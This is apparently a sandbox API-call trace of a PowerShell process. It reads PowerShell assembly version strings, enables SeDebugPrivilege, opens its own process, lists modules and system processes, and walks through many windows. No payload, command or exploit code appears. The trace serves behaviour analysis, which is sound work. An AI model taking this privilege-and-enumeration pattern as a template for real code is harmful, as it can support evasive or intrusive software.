	[0105.332] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f52bc, puLen=0x14e7d0) returned 1
	[0105.332] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0105.332] lstrcpyW (in: lpString1=0x721bd8, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0105.332] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f5320, puLen=0x14e7d0) returned 1
	[0105.332] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0105.332] lstrcpyW (in: lpString1=0x721bd8, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0105.332] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f539c, puLen=0x14e7d0) returned 1
	[0105.332] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0105.332] lstrcpyW (in: lpString1=0x721bd8, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0105.332] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x29f5044, puLen=0x14e7d0) returned 1
	[0105.332] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0105.333] lstrcpyW (in: lpString1=0x721bd8, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0105.333] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x0, puLen=0x14e7d0) returned 0
	[0105.333] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x0, puLen=0x14e7d0) returned 0
	[0105.333] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14e7d4, puLen=0x14e7d0 | out: lplpBuffer=0x14e7d4*=0x0, puLen=0x14e7d0) returned 0
	[0105.333] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14e7c8, puLen=0x14e7c4 | out: lplpBuffer=0x14e7c8*=0x29f4fec, puLen=0x14e7c4) returned 1
	[0105.335] VerLanguageNameW (in: wLang=0x0, szLang=0x721bd8, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0105.336] VerQueryValueW (in: pBlock=0x29f4f50, lpSubBlock="\\", lplpBuffer=0x14e7dc, puLen=0x14e7d8 | out: lplpBuffer=0x14e7dc*=0x29f4f78, puLen=0x14e7d8) returned 1
	[0105.342] GetCurrentProcessId () returned 0x888
	[0106.243] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x14e014 | out: lpLuid=0x14e014*(LowPart=0x14, HighPart=0)) returned 1
	[0106.245] GetLastError () returned 0x0
	[0106.248] GetCurrentProcess () returned 0xffffffff
	[0106.248] GetLastError () returned 0x0
	[0106.250] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x14e010 | out: TokenHandle=0x14e010*=0x308) returned 1
	[0106.250] GetLastError () returned 0x0
	[0106.357] AdjustTokenPrivileges (in: TokenHandle=0x308, DisableAllPrivileges=0, NewState=0x29f7a90*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0106.357] GetLastError () returned 0x0
	[0106.359] CloseHandle (hObject=0x308) returned 1
	[0106.359] GetLastError () returned 0x0
	[0106.584] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x888) returned 0x308
	[0106.584] GetLastError () returned 0x0
	[0106.595] EnumProcessModules (in: hProcess=0x308, lphModule=0x29f7ad4, cb=0x100, lpcbNeeded=0x14e804 | out: lphModule=0x29f7ad4, lpcbNeeded=0x14e804) returned 1
	[0106.701] GetLastError () returned 0x0
	[0106.704] GetModuleInformation (in: hProcess=0x308, hModule=0x221d0000, lpmodinfo=0x29f7c14, cb=0xc | out: lpmodinfo=0x29f7c14*(lpBaseOfDll=0x221d0000, SizeOfImage=0x72000, EntryPoint=0x221d7363)) returned 1
	[0106.705] GetLastError () returned 0x0
	[0106.708] GetModuleBaseNameW (in: hProcess=0x308, hModule=0x221d0000, lpBaseName=0x722398, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0106.708] GetLastError () returned 0x0
	[0106.710] GetModuleFileNameExW (in: hProcess=0x308, hModule=0x221d0000, lpFilename=0x722398, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0106.710] GetLastError () returned 0x0
	[0106.711] CloseHandle (hObject=0x308) returned 1
	[0106.711] GetLastError () returned 0x0
	[0107.187] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x888) returned 0x308
	[0107.187] GetLastError () returned 0x0
	[0107.189] GetExitCodeProcess (in: hProcess=0x308, lpExitCode=0x29f70c4 | out: lpExitCode=0x29f70c4*=0x103) returned 1
	[0107.189] GetLastError () returned 0x0
	[0107.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39f5278, Length=0x20000, ResultLength=0x14e84c | out: SystemInformation=0x39f5278, ResultLength=0x14e84c*=0xeab8) returned 0x0
	[0107.783] EnumWindows (lpEnumFunc=0x2923612, lParam=0x0) returned 1
	[0107.785] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.786] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.786] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.786] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.786] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.786] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.786] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.786] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.787] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.787] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x538
	[0107.787] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.787] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x300ee, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.787] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x400c0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.787] GetLastError () returned 0x0
	[0107.787] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x514
	[0107.788] GetLastError () returned 0x0
	[0107.788] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.788] GetLastError () returned 0x0
	[0107.788] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x778
	[0107.788] GetLastError () returned 0x0
	[0107.788] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x778
	[0107.788] GetLastError () returned 0x0
	[0107.788] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.788] GetLastError () returned 0x0
	[0107.788] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.788] GetLastError () returned 0x0
	[0107.788] GetWindowThreadProcessId (in: hWnd=0x500a0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.788] GetLastError () returned 0x0
	[0107.789] GetWindowThreadProcessId (in: hWnd=0xa0266, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xa18
	[0107.789] GetLastError () returned 0x0
	[0107.790] GetWindow (hWnd=0xa0266, uCmd=0x4) returned 0x0
	[0107.792] IsWindowVisible (hWnd=0xa0266) returned 0
	[0107.792] GetWindowThreadProcessId (in: hWnd=0x14017c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x978
	[0107.792] GetLastError () returned 0x0
	[0107.792] GetWindowThreadProcessId (in: hWnd=0x5026a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x838
	[0107.792] GetLastError () returned 0x0
	[0107.792] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xb2c
	[0107.792] GetLastError () returned 0x0
	[0107.792] GetWindowThreadProcessId (in: hWnd=0x40298, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8d4
	[0107.793] GetLastError () returned 0x0
	[0107.793] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x874
	[0107.793] GetLastError () returned 0x0
	[0107.793] GetWindowThreadProcessId (in: hWnd=0x50268, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9a8
	[0107.793] GetLastError () returned 0x0
	[0107.793] GetWindowThreadProcessId (in: hWnd=0x60106, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xb40
	[0107.793] GetLastError () returned 0x0
	[0107.793] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xa00
	[0107.793] GetLastError () returned 0x0
	[0107.793] GetWindowThreadProcessId (in: hWnd=0x900a6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.793] GetLastError () returned 0x0
	[0107.793] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.793] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x400d0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.794] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x400f0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.794] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x300de, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.794] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x300ca, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.794] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.794] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.794] GetLastError () returned 0x0
	[0107.794] GetWindowThreadProcessId (in: hWnd=0x1025e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9f0
	[0107.794] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9e0
	[0107.795] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9d0
	[0107.795] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9c0
	[0107.795] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9b0
	[0107.795] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x9a0
	[0107.795] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x990
	[0107.795] GetLastError () returned 0x0
	[0107.795] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x980
	[0107.795] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x970
	[0107.796] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x960
	[0107.796] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x950
	[0107.796] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x10230, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x940
	[0107.796] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x930
	[0107.796] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x920
	[0107.796] GetLastError () returned 0x0
	[0107.796] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x910
	[0107.927] GetLastError () returned 0x0
	[0107.927] GetWindowThreadProcessId (in: hWnd=0x10220, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x900
	[0107.927] GetLastError () returned 0x0
	[0107.927] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8f0
	[0107.927] GetLastError () returned 0x0
	[0107.927] GetWindowThreadProcessId (in: hWnd=0x10218, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8e0
	[0107.927] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8d0
	[0107.928] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x10210, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8c0
	[0107.928] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8b0
	[0107.928] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x10208, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x8a0
	[0107.928] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x890
	[0107.928] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x880
	[0107.928] GetLastError () returned 0x0
	[0107.928] GetWindowThreadProcessId (in: hWnd=0x101fc, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x870
	[0107.929] GetLastError () returned 0x0
	[0107.929] GetWindowThreadProcessId (in: hWnd=0x101f8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x860
	[0107.929] GetLastError () returned 0x0
	[0107.929] GetWindowThreadProcessId (in: hWnd=0x101f4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x850
	[0107.929] GetLastError () returned 0x0
	[0107.929] GetWindowThreadProcessId (in: hWnd=0x101f0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x840
	[0107.929] GetLastError () returned 0x0
	[0107.929] GetWindowThreadProcessId (in: hWnd=0x101ec, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x830
	[0107.929] GetLastError () returned 0x0
	[0107.929] GetWindowThreadProcessId (in: hWnd=0x101e8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x820
	[0107.929] GetLastError () returned 0x0
	[0107.929] GetWindowThreadProcessId (in: hWnd=0x101e4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x810
	[0107.929] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x20c
	[0107.930] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7c4
	[0107.930] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0xc0
	[0107.930] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101d4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x688
	[0107.930] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x6c0
	[0107.930] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101cc, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x408
	[0107.930] GetLastError () returned 0x0
	[0107.930] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7d4
	[0107.930] GetLastError () returned 0x0
	[0107.931] GetWindowThreadProcessId (in: hWnd=0x101c4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x544
	[0107.931] GetLastError () returned 0x0
	[0107.931] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x540
	[0107.931] GetLastError () returned 0x0
	[0107.931] GetWindowThreadProcessId (in: hWnd=0x101bc, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x71c
	[0107.931] GetLastError () returned 0x0
	[0107.931] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x31c
	[0107.931] GetLastError () returned 0x0
	[0107.931] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7ec
	[0107.931] GetLastError () returned 0x0
	[0107.931] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x5b8
	[0107.931] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x754
	[0107.932] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x664
	[0107.932] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x640
	[0107.932] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x700
	[0107.932] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x410
	[0107.932] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7a0
	[0107.932] GetLastError () returned 0x0
	[0107.932] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x3b4
	[0107.932] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x5cc
	[0107.933] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x5d4
	[0107.933] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7c0
	[0107.933] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x364
	[0107.933] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x240
	[0107.933] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x560
	[0107.933] GetLastError () returned 0x0
	[0107.933] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x57c
	[0107.934] GetLastError () returned 0x0
	[0107.934] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x7b0
	[0107.934] GetLastError () returned 0x0
	[0107.934] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x6a4
	[0107.934] GetLastError () returned 0x0
	[0107.934] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x32c
	[0107.934] GetLastError () returned 0x0
	[0107.934] GetWindowThreadProcessId (in: hWnd=0x20164, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x670
	[0107.934] GetLastError () returned 0x0
	[0107.934] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4f0
	[0107.934] GetLastError () returned 0x0
	[0107.934] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x514
	[0107.934] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x50c
	[0107.935] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x20142, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x514
	[0107.935] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x50c
	[0107.935] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x514
	[0107.935] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4f0
	[0107.935] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4f0
	[0107.935] GetLastError () returned 0x0
	[0107.935] GetWindowThreadProcessId (in: hWnd=0x200a8, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x58c
	[0107.935] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x578
	[0107.936] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x458
	[0107.936] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x530
	[0107.936] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.936] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x508
	[0107.936] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.936] GetLastError () returned 0x0
	[0107.936] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4f4
	[0107.936] GetLastError () returned 0x0
	[0107.937] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.937] GetLastError () returned 0x0
	[0107.937] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x4ac
	[0107.937] GetLastError () returned 0x0
	[0107.937] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x14e4a0 | out: lpdwProcessId=0x14e4a0) returned 0x794
	[0107.937] GetLastError () returned 0x0
